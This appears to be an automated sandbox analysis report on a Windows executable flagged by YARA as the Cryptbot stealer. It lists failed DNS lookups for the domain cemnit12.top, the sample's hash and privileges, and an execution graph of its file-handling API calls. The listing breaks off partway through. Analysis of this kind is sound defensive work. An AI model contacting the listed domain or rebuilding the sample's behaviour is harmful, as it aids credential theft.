                                          Oct 13, 2021 03:22:19.216985941 CEST8.8.8.8192.168.2.40x2d34Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:23.716187954 CEST8.8.8.8192.168.2.40xb865Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:24.749830961 CEST8.8.8.8192.168.2.40xb865Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:29.688690901 CEST8.8.8.8192.168.2.40xad6Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:30.705342054 CEST8.8.8.8192.168.2.40xad6Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:31.735200882 CEST8.8.8.8192.168.2.40x3214Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:32.411879063 CEST8.8.8.8192.168.2.40x3214Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:33.751461983 CEST8.8.8.8192.168.2.40xa7deServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:34.170511007 CEST8.8.8.8192.168.2.40xa7deServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:38.754662037 CEST8.8.8.8192.168.2.40xf2cdServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:39.874382973 CEST8.8.8.8192.168.2.40xf2cdServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:40.148868084 CEST8.8.8.8192.168.2.40x2315Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:41.080971956 CEST8.8.8.8192.168.2.40x2315Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:41.582231998 CEST8.8.8.8192.168.2.40xeea3Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:42.795219898 CEST8.8.8.8192.168.2.40xeea3Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:43.025391102 CEST8.8.8.8192.168.2.40xc7e8Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:44.356070042 CEST8.8.8.8192.168.2.40xa034Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:45.078459024 CEST8.8.8.8192.168.2.40xc7e8Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:46.001868010 CEST8.8.8.8192.168.2.40xa034Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:46.397176027 CEST8.8.8.8192.168.2.40x1da0Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:46.729011059 CEST8.8.8.8192.168.2.40x1da0Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:48.407321930 CEST8.8.8.8192.168.2.40x524eServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:49.749732018 CEST8.8.8.8192.168.2.40x524eServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:53.322173119 CEST8.8.8.8192.168.2.40xae31Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:54.397630930 CEST8.8.8.8192.168.2.40xae31Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)

                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          System Behavior

                                          General

                                          Start time:03:20:47
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\file.exe'
                                          Imagebase:0x400000
                                          File size:433664 bytes
                                          MD5 hash:6738381DDD3D2952312AF2A0F2BE5157
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:low

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:11.3%
                                            Dynamic/Decrypted Code Coverage:12.1%
                                            Signature Coverage:20.5%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:80

                                            Graph

                                            execution_graph 24481 4281e2 24486 427f77 24481->24486 24485 428221 24491 427fa5 ___vcrt_InitializeCriticalSectionEx 24486->24491 24488 4281d0 24505 41d389 14 API calls __strnicoll 24488->24505 24490 428100 24490->24485 24498 42fded 24490->24498 24496 4280f5 24491->24496 24501 42efd0 35 API calls 2 library calls 24491->24501 24493 42815d 24493->24496 24502 42efd0 35 API calls 2 library calls 24493->24502 24495 42817b 24495->24496 24503 42efd0 35 API calls 2 library calls 24495->24503 24496->24490 24504 4229da 14 API calls _free 24496->24504 24506 42f4f6 24498->24506 24501->24493 24502->24495 24503->24496 24504->24488 24505->24490 24507 42f502 ___scrt_is_nonwritable_in_current_image 24506->24507 24508 42f509 24507->24508 24511 42f534 24507->24511 24564 4229da 14 API calls _free 24508->24564 24510 42f50e 24565 41d389 14 API calls __strnicoll 24510->24565 24517 42fac3 24511->24517 24516 42f518 24516->24485 24567 42f89f 24517->24567 24520 42faf5 24648 4229c7 14 API calls _free 24520->24648 24521 42fb0e 24584 42c737 24521->24584 24525 42fafa 24649 4229da 14 API calls _free 24525->24649 24526 42fb33 24597 42f80a CreateFileW 24526->24597 24527 42fb1c 24650 4229c7 14 API calls _free 24527->24650 24531 42fb21 24651 4229da 14 API calls _free 24531->24651 24533 42fbe9 GetFileType 24534 42fbf4 GetLastError 24533->24534 24535 42fc3b 24533->24535 24654 4229a4 14 API calls 2 library calls 24534->24654 24598 42c682 24535->24598 24536 42fbbe GetLastError 24653 4229a4 14 API calls 2 library calls 24536->24653 24538 42fb6c 24538->24533 24538->24536 24652 42f80a CreateFileW 24538->24652 24540 42fc02 CloseHandle 24540->24525 24542 42fc2b 24540->24542 24655 4229da 14 API calls _free 24542->24655 24544 42fbb1 24544->24533 24544->24536 24547 42fc30 24547->24525 24548 42fca8 24552 42fcaf 24548->24552 24622 42f5b7 24548->24622 24656 424d2b 24552->24656 24553 42fceb 24555 42f558 24553->24555 24556 42fd67 CloseHandle 24553->24556 24566 42f58b LeaveCriticalSection __wsopen_s 24555->24566 24671 42f80a CreateFileW 24556->24671 24558 42fd92 24559 42fdc8 24558->24559 24560 42fd9c GetLastError 24558->24560 24559->24555 24672 4229a4 14 API calls 2 library calls 24560->24672 24562 42fda8 24673 42c84a 15 API calls 3 library calls 24562->24673 24564->24510 24565->24516 24566->24516 24568 42f8c0 24567->24568 24569 42f8da 24567->24569 24568->24569 24681 4229da 14 API calls _free 24568->24681 24674 42f82f 24569->24674 24572 42f8cf 24682 41d389 14 API calls __strnicoll 24572->24682 24574 42f912 24576 42f941 24574->24576 24683 4229da 14 API calls _free 24574->24683 24575 42f994 24575->24520 24575->24521 24576->24575 24685 423f62 14 API calls 2 library calls 24576->24685 24579 42f936 24684 41d389 14 API calls __strnicoll 24579->24684 24580 42f98f 24580->24575 24686 41d3b6 IsProcessorFeaturePresent 24580->24686 24583 42fa18 24585 42c743 ___scrt_is_nonwritable_in_current_image 24584->24585 24706 427f18 EnterCriticalSection 24585->24706 24587 42c74a 24589 42c76f 24587->24589 24593 42c7de EnterCriticalSection 24587->24593 24595 42c791 24587->24595 24710 42c511 15 API calls 3 library calls 24589->24710 24592 42c774 24592->24595 24711 42c65f EnterCriticalSection 24592->24711 24594 42c7eb LeaveCriticalSection 24593->24594 24593->24595 24594->24587 24707 42c841 24595->24707 24597->24538 24599 42c691 24598->24599 24600 42c6fa 24598->24600 24599->24600 24606 42c6b7 __wsopen_s 24599->24606 24713 4229da 14 API calls _free 24600->24713 24602 42c6ff 24714 4229c7 14 API calls _free 24602->24714 24604 42c6e7 24604->24548 24607 42fa19 24604->24607 24605 42c6e1 SetStdHandle 24605->24604 24606->24604 24606->24605 24608 42fa41 24607->24608 24609 42fa73 24607->24609 24608->24609 24715 4286fd 24608->24715 24609->24548 24612 42fa61 24783 4229c7 14 API calls _free 24612->24783 24613 42fa77 24718 428d30 24613->24718 24617 42fa66 24617->24609 24784 4229da 14 API calls _free 24617->24784 24618 42fa9f 24618->24617 24619 4286fd __fread_nolock 16 API calls 24618->24619 24619->24617 24623 42f5e7 24622->24623 24624 42f743 24622->24624 24630 42f607 24623->24630 24885 423f62 14 API calls 2 library calls 24623->24885 24624->24552 24624->24553 24626 42f5fe 24627 42f7ff 24626->24627 24626->24630 24628 41d3b6 _strftime 11 API calls 24627->24628 24629 42f809 24628->24629 24630->24624 24632 42f6bb 24630->24632 24633 4286fd __fread_nolock 16 API calls 24630->24633 24631 428d30 __fread_nolock 26 API calls 24637 42f6e0 24631->24637 24632->24624 24632->24631 24634 42f73e 24632->24634 24639 42f70e 24632->24639 24635 42f722 24633->24635 24886 4229da 14 API calls _free 24634->24886 24638 4286fd __fread_nolock 16 API calls 24635->24638 24635->24639 24637->24634 24637->24639 24640 42f75f 24637->24640 24641 42f76c 24637->24641 24642 42f78e 24637->24642 24638->24632 24639->24624 24639->24634 24860 42751e 24639->24860 24887 4229da 14 API calls _free 24640->24887 24641->24642 24645 42f773 24641->24645 24643 4286fd __fread_nolock 16 API calls 24642->24643 24643->24639 24647 4286fd __fread_nolock 16 API calls 24645->24647 24647->24639 24648->24525 24649->24555 24650->24531 24651->24525 24652->24544 24653->24525 24654->24540 24655->24547 24657 42c8db __wsopen_s 14 API calls 24656->24657 24659 424d3b 24657->24659 24658 424d41 25009 42c84a 15 API calls 3 library calls 24658->25009 24659->24658 24660 424d73 24659->24660 24663 42c8db __wsopen_s 14 API calls 24659->24663 24660->24658 24664 42c8db __wsopen_s 14 API calls 24660->24664 24662 424d99 24665 424dbb 24662->24665 25010 4229a4 14 API calls 2 library calls 24662->25010 24666 424d6a 24663->24666 24667 424d7f FindCloseChangeNotification 24664->24667 24665->24555 24669 42c8db __wsopen_s 14 API calls 24666->24669 24667->24658 24670 424d8b GetLastError 24667->24670 24669->24660 24670->24658 24671->24558 24672->24562 24673->24559 24676 42f847 24674->24676 24675 42f862 24675->24574 24676->24675 24690 4229da 14 API calls _free 24676->24690 24678 42f886 24691 41d389 14 API calls __strnicoll 24678->24691 24680 42f891 24680->24574 24681->24572 24682->24569 24683->24579 24684->24576 24685->24580 24687 41d3c2 24686->24687 24692 41d1dd 24687->24692 24690->24678 24691->24680 24693 41d1f9 ___scrt_fastfail 24692->24693 24694 41d225 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 24693->24694 24697 41d2f6 ___scrt_fastfail 24694->24697 24696 41d314 GetCurrentProcess TerminateProcess 24696->24583 24698 416e2c 24697->24698 24699 416e35 24698->24699 24700 416e37 IsProcessorFeaturePresent 24698->24700 24699->24696 24702 416e79 24700->24702 24705 416e3d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24702->24705 24704 416f5c 24704->24696 24705->24704 24706->24587 24712 427f60 LeaveCriticalSection 24707->24712 24709 42c7b1 24709->24526 24709->24527 24710->24592 24711->24595 24712->24709 24713->24602 24714->24604 24786 4285d9 24715->24786 24719 428d42 24718->24719 24720 428d5a 24718->24720 24824 4229c7 14 API calls _free 24719->24824 24722 4290c1 24720->24722 24727 428d9a 24720->24727 24851 4229c7 14 API calls _free 24722->24851 24723 428d47 24825 4229da 14 API calls _free 24723->24825 24726 4290c6 24852 4229da 14 API calls _free 24726->24852 24728 428d4f 24727->24728 24730 428da5 24727->24730 24734 428dd4 24727->24734 24728->24618 24785 4314ea 59 API calls 5 library calls 24728->24785 24826 4229c7 14 API calls _free 24730->24826 24731 428db2 24853 41d389 14 API calls __strnicoll 24731->24853 24733 428daa 24827 4229da 14 API calls _free 24733->24827 24737 428ded 24734->24737 24738 428e44 24734->24738 24739 428e08 24734->24739 24737->24739 24770 428df2 24737->24770 24831 425373 24738->24831 24828 4229c7 14 API calls _free 24739->24828 24742 428e0d 24829 4229da 14 API calls _free 24742->24829 24747 428e14 24830 41d389 14 API calls __strnicoll 24747->24830 24748 428f9b 24751 429011 24748->24751 24754 428fb4 GetConsoleMode 24748->24754 24749 428e64 24752 424bd8 _free 14 API calls 24749->24752 24753 429015 ReadFile 24751->24753 24756 428e6b 24752->24756 24757 429089 GetLastError 24753->24757 24758 42902f 24753->24758 24754->24751 24755 428fc5 24754->24755 24755->24753 24759 428fcb ReadConsoleW 24755->24759 24760 428e90 24756->24760 24761 428e75 24756->24761 24762 429096 24757->24762 24763 428fed 24757->24763 24758->24757 24764 429006 24758->24764 24759->24764 24765 428fe7 GetLastError 24759->24765 24769 4286fd __fread_nolock 16 API calls 24760->24769 24844 4229da 14 API calls _free 24761->24844 24849 4229da 14 API calls _free 24762->24849 24780 428e1f __fread_nolock 24763->24780 24846 4229a4 14 API calls 2 library calls 24763->24846 24775 429054 24764->24775 24776 42906b 24764->24776 24764->24780 24765->24763 24766 424bd8 _free 14 API calls 24766->24728 24769->24770 24815 42ee3b 24770->24815 24772 428e7a 24845 4229c7 14 API calls _free 24772->24845 24773 42909b 24850 4229c7 14 API calls _free 24773->24850 24847 428a4a 19 API calls 4 library calls 24775->24847 24779 429082 24776->24779 24776->24780 24848 428879 17 API calls __fread_nolock 24779->24848 24780->24766 24782 429087 24782->24780 24783->24617 24784->24609 24785->24618 24795 42c8db 24786->24795 24788 4285eb 24789 4285f3 24788->24789 24790 428604 SetFilePointerEx 24788->24790 24808 4229da 14 API calls _free 24789->24808 24791 42861c GetLastError 24790->24791 24794 4285f8 24790->24794 24809 4229a4 14 API calls 2 library calls 24791->24809 24794->24612 24794->24613 24796 42c8e8 24795->24796 24797 42c8fd 24795->24797 24810 4229c7 14 API calls _free 24796->24810 24801 42c922 24797->24801 24812 4229c7 14 API calls _free 24797->24812 24800 42c8ed 24811 4229da 14 API calls _free 24800->24811 24801->24788 24802 42c92d 24813 4229da 14 API calls _free 24802->24813 24805 42c935 24814 41d389 14 API calls __strnicoll 24805->24814 24806 42c8f5 24806->24788 24808->24794 24809->24794 24810->24800 24811->24806 24812->24802 24813->24805 24814->24806 24816 42ee55 24815->24816 24817 42ee48 24815->24817 24820 42ee61 24816->24820 24855 4229da 14 API calls _free 24816->24855 24854 4229da 14 API calls _free 24817->24854 24819 42ee4d 24819->24748 24820->24748 24822 42ee82 24856 41d389 14 API calls __strnicoll 24822->24856 24824->24723 24825->24728 24826->24733 24827->24731 24828->24742 24829->24747 24830->24780 24832 4253b1 24831->24832 24837 425381 _unexpected 24831->24837 24858 4229da 14 API calls _free 24832->24858 24834 42539c RtlAllocateHeap 24835 4253af 24834->24835 24834->24837 24838 424bd8 24835->24838 24837->24832 24837->24834 24857 422d13 EnterCriticalSection LeaveCriticalSection _unexpected 24837->24857 24839 424be3 RtlFreeHeap 24838->24839 24840 424c0c _free 24838->24840 24839->24840 24841 424bf8 24839->24841 24840->24749 24859 4229da 14 API calls _free 24841->24859 24843 424bfe GetLastError 24843->24840 24844->24772 24845->24780 24846->24780 24847->24780 24848->24782 24849->24773 24850->24780 24851->24726 24852->24731 24853->24728 24854->24819 24855->24822 24856->24819 24857->24837 24858->24835 24859->24843 24861 42752a ___scrt_is_nonwritable_in_current_image 24860->24861 24862 427532 24861->24862 24866 42754a 24861->24866 24932 4229c7 14 API calls _free 24862->24932 24864 4275e5 24937 4229c7 14 API calls _free 24864->24937 24865 427537 24933 4229da 14 API calls _free 24865->24933 24866->24864 24869 42757c 24866->24869 24888 42c65f EnterCriticalSection 24869->24888 24870 4275ea 24938 4229da 14 API calls _free 24870->24938 24873 427582 24875 4275b3 24873->24875 24876 42759e 24873->24876 24874 4275f2 24939 41d389 14 API calls __strnicoll 24874->24939 24889 427610 24875->24889 24934 4229da 14 API calls _free 24876->24934 24880 4275a3 24935 4229c7 14 API calls _free 24880->24935 24881 4275ae 24936 4275dd LeaveCriticalSection __wsopen_s 24881->24936 24884 42753f 24884->24639 24885->24626 24886->24624 24887->24634 24888->24873 24890 427632 24889->24890 24929 42764e 24889->24929 24891 427636 24890->24891 24893 427686 24890->24893 24961 4229c7 14 API calls _free 24891->24961 24895 427699 24893->24895 24897 4286fd __fread_nolock 16 API calls 24893->24897 24894 42763b 24962 4229da 14 API calls _free 24894->24962 24940 4271b7 24895->24940 24897->24895 24899 427643 24963 41d389 14 API calls __strnicoll 24899->24963 24902 4276ee 24904 427702 24902->24904 24905 427747 WriteFile 24902->24905 24903 4276af 24906 4276b3 24903->24906 24907 4276d8 24903->24907 24910 427737 24904->24910 24911 42770d 24904->24911 24908 42776b GetLastError 24905->24908 24916 4276ce 24905->24916 24906->24916 24964 42714f 6 API calls __wsopen_s 24906->24964 24965 426da5 40 API calls 6 library calls 24907->24965 24908->24916 24954 427228 24910->24954 24912 427712 24911->24912 24913 427727 24911->24913 24912->24916 24947 427303 24912->24947 24966 4273ec 8 API calls 3 library calls 24913->24966 24918 427791 24916->24918 24919 4277bb 24916->24919 24916->24929 24922 427798 24918->24922 24923 4277af 24918->24923 24919->24929 24970 4229da 14 API calls _free 24919->24970 24921 427735 24921->24916 24967 4229da 14 API calls _free 24922->24967 24969 4229a4 14 API calls 2 library calls 24923->24969 24927 4277d3 24971 4229c7 14 API calls _free 24927->24971 24928 42779d 24968 4229c7 14 API calls _free 24928->24968 24929->24881 24932->24865 24933->24884 24934->24880 24935->24881 24936->24884 24937->24870 24938->24874 24939->24884 24941 42ee3b __fread_nolock 14 API calls 24940->24941 24942 4271c8 24941->24942 24943 42721e 24942->24943 24972 425cf9 GetLastError 24942->24972 24943->24902 24943->24903 24946 427205 GetConsoleMode 24946->24943 24949 427312 __wsopen_s 24947->24949 24948 4273d1 24950 416e2c CatchGuardHandler 5 API calls 24948->24950 24949->24948 24951 427387 WriteFile 24949->24951 24952 4273ea 24950->24952 24951->24949 24953 4273d3 GetLastError 24951->24953 24952->24916 24953->24948 24959 427237 __wsopen_s 24954->24959 24955 4272e8 24956 416e2c CatchGuardHandler 5 API calls 24955->24956 24957 427301 24956->24957 24957->24916 24958 4272a7 WriteFile 24958->24959 24960 4272ea GetLastError 24958->24960 24959->24955 24959->24958 24960->24955 24961->24894 24962->24899 24963->24929 24964->24916 24965->24916 24966->24921 24967->24928 24968->24929 24969->24929 24970->24927 24971->24929 24973 425d10 24972->24973 24977 425d16 24972->24977 25001 429683 6 API calls _unexpected 24973->25001 24976 425d34 24978 425d1c SetLastError 24976->24978 24979 425d38 24976->24979 24977->24978 25002 4296c2 6 API calls _unexpected 24977->25002 24985 425db0 24978->24985 24986 425daa 24978->24986 25003 42a855 14 API calls 2 library calls 24979->25003 24982 425d44 24983 425d63 24982->24983 24984 425d4c 24982->24984 25005 4296c2 6 API calls _unexpected 24983->25005 25004 4296c2 6 API calls _unexpected 24984->25004 25008 424274 34 API calls CallUnexpected 24985->25008 24986->24943 24986->24946 24990 425d5a 24995 424bd8 _free 14 API calls 24990->24995 24992 425d6f 24993 425d73 24992->24993 24994 425d84 24992->24994 25006 4296c2 6 API calls _unexpected 24993->25006 25007 425b27 14 API calls _unexpected 24994->25007 24998 425d60 24995->24998 24998->24978 24999 425d8f 25000 424bd8 _free 14 API calls 24999->25000 25000->24998 25001->24977 25002->24976 25003->24982 25004->24990 25005->24992 25006->24990 25007->24999 25009->24662 25010->24665 25011 414b60 25019 416347 25011->25019 25013 414b87 25013->25013 25014 414c40 CreateFileW 25013->25014 25016 414c61 25013->25016 25015 414c6f 25014->25015 25014->25016 25017 416347 16 API calls 25015->25017 25018 414c8f 25017->25018 25022 41634c 25019->25022 25021 416366 25021->25013 25022->25021 25024 416368 25022->25024 25029 41d3ea 25022->25029 25036 422d13 EnterCriticalSection LeaveCriticalSection _unexpected 25022->25036 25025 41686e 25024->25025 25037 4178db RaiseException 25024->25037 25038 4178db RaiseException 25025->25038 25028 41688b 25034 425373 _unexpected 25029->25034 25030 4253b1 25040 4229da 14 API calls _free 25030->25040 25032 42539c RtlAllocateHeap 25033 4253af 25032->25033 25032->25034 25033->25022 25034->25030 25034->25032 25039 422d13 EnterCriticalSection LeaveCriticalSection _unexpected 25034->25039 25036->25022 25037->25025 25038->25028 25039->25034 25040->25033 25041 414d20 25042 414d34 25041->25042 25043 414d24 25041->25043 25044 414d39 25042->25044 25047 414000 25042->25047 25046 414d5a 25048 414012 25047->25048 25050 414024 25047->25050 25048->25046 25049 41402a 25049->25046 25050->25049 25051 4141a6 25050->25051 25166 422ad0 35 API calls 3 library calls 25050->25166 25053 4141f7 25051->25053 25054 41420b CreateFileW 25051->25054 25053->25046 25056 414228 25054->25056 25057 41423c 25054->25057 25055 414128 25055->25051 25167 422ad0 35 API calls 3 library calls 25055->25167 25056->25046 25148 413a40 25057->25148 25060 414245 25062 414261 WideCharToMultiByte 25060->25062 25063 41424b CloseHandle 25060->25063 25061 41413a 25061->25051 25168 422ad0 35 API calls 3 library calls 25061->25168 25067 4142b0 25062->25067 25063->25046 25065 41414c 25065->25051 25169 422ad0 35 API calls 3 library calls 25065->25169 25158 412c40 WriteFile 25067->25158 25068 41415e 25068->25051 25170 422ad0 35 API calls 3 library calls 25068->25170 25070 414464 25072 4144a1 25070->25072 25073 41446b 25070->25073 25075 4144b6 25072->25075 25076 4144ea 25072->25076 25077 41447b CloseHandle 25073->25077 25122 414482 25073->25122 25074 414170 25074->25051 25171 422ad0 35 API calls 3 library calls 25074->25171 25079 4144d0 25075->25079 25083 4144c6 CloseHandle 25075->25083 25080 414574 25076->25080 25081 41455b GetDesktopWindow GetTickCount 25076->25081 25077->25122 25079->25046 25090 414588 25080->25090 25159 41da01 25080->25159 25174 41da22 34 API calls _unexpected 25081->25174 25082 414182 25082->25051 25172 422ad0 35 API calls 3 library calls 25082->25172 25083->25079 25085 414571 25085->25080 25088 414194 25088->25051 25173 422ad0 35 API calls 3 library calls 25088->25173 25091 414617 25090->25091 25175 4138f0 25090->25175 25092 414640 25091->25092 25093 414630 25091->25093 25096 41463c 25092->25096 25179 413bf0 25092->25179 25162 413cb0 25093->25162 25098 4146af CloseHandle 25096->25098 25099 4146b6 25096->25099 25098->25099 25100 41483b 25099->25100 25102 41470b 25099->25102 25099->25122 25101 414a71 25100->25101 25105 4138f0 WriteFile 25100->25105 25101->25046 25106 41474a 25102->25106 25107 414821 25102->25107 25108 414783 SetFilePointer 25102->25108 25103 414659 25103->25096 25104 4138f0 WriteFile 25103->25104 25112 413bf0 ReadFile 25103->25112 25104->25103 25109 41486c 25105->25109 25110 41474f 25106->25110 25183 412c40 WriteFile 25106->25183 25107->25046 25108->25106 25111 4138f0 WriteFile 25109->25111 25110->25046 25114 41487f 25111->25114 25112->25103 25115 4138f0 WriteFile 25114->25115 25116 414892 25115->25116 25117 4138f0 WriteFile 25116->25117 25119 4148a5 25117->25119 25118 414797 25121 4147f6 SetFilePointer 25118->25121 25118->25122 25128 4147c9 __fread_nolock 25118->25128 25120 4138f0 WriteFile 25119->25120 25123 4148bc 25120->25123 25121->25128 25122->25046 25124 4138f0 WriteFile 25123->25124 25125 4148d5 25124->25125 25126 4138f0 WriteFile 25125->25126 25127 4148ee 25126->25127 25129 4138f0 WriteFile 25127->25129 25128->25122 25131 416347 16 API calls 25128->25131 25130 414907 25129->25130 25132 4138f0 WriteFile 25130->25132 25136 414a1a 25131->25136 25133 41491e 25132->25133 25134 4138f0 WriteFile 25133->25134 25135 414937 25134->25135 25137 4138f0 WriteFile 25135->25137 25136->25046 25136->25136 25138 414950 25137->25138 25139 4138f0 WriteFile 25138->25139 25140 414969 25139->25140 25141 4138f0 WriteFile 25140->25141 25142 414980 25141->25142 25143 4138f0 WriteFile 25142->25143 25144 414999 25143->25144 25145 4138f0 WriteFile 25144->25145 25146 4149b2 25145->25146 25147 4138f0 WriteFile 25146->25147 25147->25128 25149 413bbd 25148->25149 25150 413a8e 25148->25150 25149->25060 25150->25149 25151 413a97 SetFilePointer 25150->25151 25152 413ae4 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 25151->25152 25153 413aad 25151->25153 25154 413b51 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25152->25154 25184 413670 GetFileInformationByHandle 25153->25184 25154->25060 25156 413ac0 25156->25149 25157 413acb SetFilePointer 25156->25157 25157->25060 25158->25070 25160 425cf9 _unexpected 34 API calls 25159->25160 25161 41da06 25160->25161 25161->25080 25163 413cc4 25162->25163 25165 413cce ___scrt_fastfail 25162->25165 25164 416347 16 API calls 25163->25164 25164->25165 25165->25096 25166->25055 25167->25061 25168->25065 25169->25068 25170->25074 25171->25082 25172->25088 25173->25051 25174->25085 25176 413907 __fread_nolock 25175->25176 25177 413a0e WriteFile 25176->25177 25178 4139d5 __fread_nolock 25176->25178 25177->25091 25178->25091 25180 413c51 25179->25180 25182 413c00 __fread_nolock 25179->25182 25181 413c58 ReadFile 25180->25181 25180->25182 25181->25182 25182->25103 25183->25118 25185 41369a GetFileSize 25184->25185 25186 41368d 25184->25186 25188 413717 SetFilePointer ReadFile SetFilePointer ReadFile 25185->25188 25191 4137b3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25185->25191 25186->25156 25189 413765 25188->25189 25188->25191 25190 413770 SetFilePointer ReadFile 25189->25190 25189->25191 25192 413798 25190->25192 25193 4138b1 25191->25193 25194 41384f FileTimeToSystemTime 25191->25194 25192->25191 25193->25156 25194->25193 25195 40c982 25196 40c9a3 25195->25196 25197 40c9cb 25195->25197 25196->25197 25199 40d98a 25196->25199 25358 40f2f0 25197->25358 25353 41d399 25199->25353 25200 40c9e7 25367 40f5a0 25200->25367 25208 40c9fd 25209 40f2f0 27 API calls 25208->25209 25210 40cab8 25209->25210 25212 40f5a0 27 API calls 25210->25212 25222 40cace 25212->25222 25217 40f2f0 27 API calls 25219 40cb89 25217->25219 25223 40f5a0 27 API calls 25219->25223 25222->25217 25231 40cb9f 25223->25231 25228 40f2f0 27 API calls 25229 40cc5a 25228->25229 25230 40f5a0 27 API calls 25229->25230 25232 40cc70 25230->25232 25231->25228 25232->25232 25371 40f0f0 25232->25371 25234 40cd5e 25235 40f0f0 27 API calls 25234->25235 25236 40cda4 25235->25236 25387 403100 25236->25387 25238 40cdb0 25239 40f0f0 27 API calls 25238->25239 25240 40cdf2 25239->25240 25241 40f0f0 27 API calls 25240->25241 25242 40ce3e 25241->25242 25243 403100 27 API calls 25242->25243 25244 40ce4a 25243->25244 25245 40f0f0 27 API calls 25244->25245 25246 40ce8e 25245->25246 25247 40f0f0 27 API calls 25246->25247 25248 40ced4 25247->25248 25249 403100 27 API calls 25248->25249 25250 40cee0 25249->25250 25251 40f0f0 27 API calls 25250->25251 25252 40cf22 25251->25252 25253 40f0f0 27 API calls 25252->25253 25254 40cf6e 25253->25254 25255 403100 27 API calls 25254->25255 25256 40cf7a 25255->25256 25257 40f0f0 27 API calls 25256->25257 25258 40cfbe 25257->25258 25259 40f0f0 27 API calls 25258->25259 25260 40d004 25259->25260 25261 403100 27 API calls 25260->25261 25262 40d010 25261->25262 25263 40f0f0 27 API calls 25262->25263 25264 40d052 25263->25264 25265 40f0f0 27 API calls 25264->25265 25266 40d09e 25265->25266 25267 403100 27 API calls 25266->25267 25268 40d0aa 25267->25268 25269 40f0f0 27 API calls 25268->25269 25270 40d0ee 25269->25270 25271 40f0f0 27 API calls 25270->25271 25272 40d134 25271->25272 25273 403100 27 API calls 25272->25273 25274 40d140 25273->25274 25275 40f0f0 27 API calls 25274->25275 25276 40d182 25275->25276 25277 40f0f0 27 API calls 25276->25277 25278 40d1ce 25277->25278 25279 403100 27 API calls 25278->25279 25280 40d1da 25279->25280 25281 40f0f0 27 API calls 25280->25281 25282 40d21e 25281->25282 25283 40f0f0 27 API calls 25282->25283 25284 40d264 25283->25284 25285 403100 27 API calls 25284->25285 25286 40d270 25285->25286 25287 40f0f0 27 API calls 25286->25287 25288 40d2b2 25287->25288 25289 40f0f0 27 API calls 25288->25289 25290 40d2fe 25289->25290 25291 403100 27 API calls 25290->25291 25292 40d30a 25291->25292 25293 40f0f0 27 API calls 25292->25293 25294 40d34e 25293->25294 25295 40f0f0 27 API calls 25294->25295 25296 40d394 25295->25296 25297 403100 27 API calls 25296->25297 25298 40d3a0 25297->25298 25299 40f0f0 27 API calls 25298->25299 25300 40d3e2 25299->25300 25301 40f0f0 27 API calls 25300->25301 25302 40d42e 25301->25302 25303 403100 27 API calls 25302->25303 25304 40d43a 25303->25304 25305 40f0f0 27 API calls 25304->25305 25306 40d47e 25305->25306 25307 40f0f0 27 API calls 25306->25307 25308 40d4c4 25307->25308 25309 403100 27 API calls 25308->25309 25310 40d4d0 25309->25310 25311 40f0f0 27 API calls 25310->25311 25312 40d512 25311->25312 25313 